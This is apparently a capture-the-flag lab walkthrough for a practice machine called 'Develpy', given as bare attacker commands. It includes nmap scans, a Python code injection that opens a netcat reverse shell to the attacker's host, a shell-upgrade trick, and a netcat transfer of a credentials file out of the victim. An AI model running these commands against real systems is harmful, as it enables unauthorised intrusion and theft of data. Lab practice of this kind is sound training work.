# Develpy **Room Link:** ### Initial Scan **Kali**

nmap -A $VICTIM

### Scan all ports **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

### TCP/10000 - Python script **Kali #1** ``` nc -lvnp 1337 ``` **Kali #2** ``` nc $VICTIM 10000 __import__('os').system('nc -e /bin/bash $KALI 1337') ```

Get autocomplete ``` python -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` ## Netcat **Kali(receiving)** ``` nc -l -p 1234 > credentials.png ``` **Victim(sending)** ``` nc -w 3 $KALI 1234 < credentials.png ```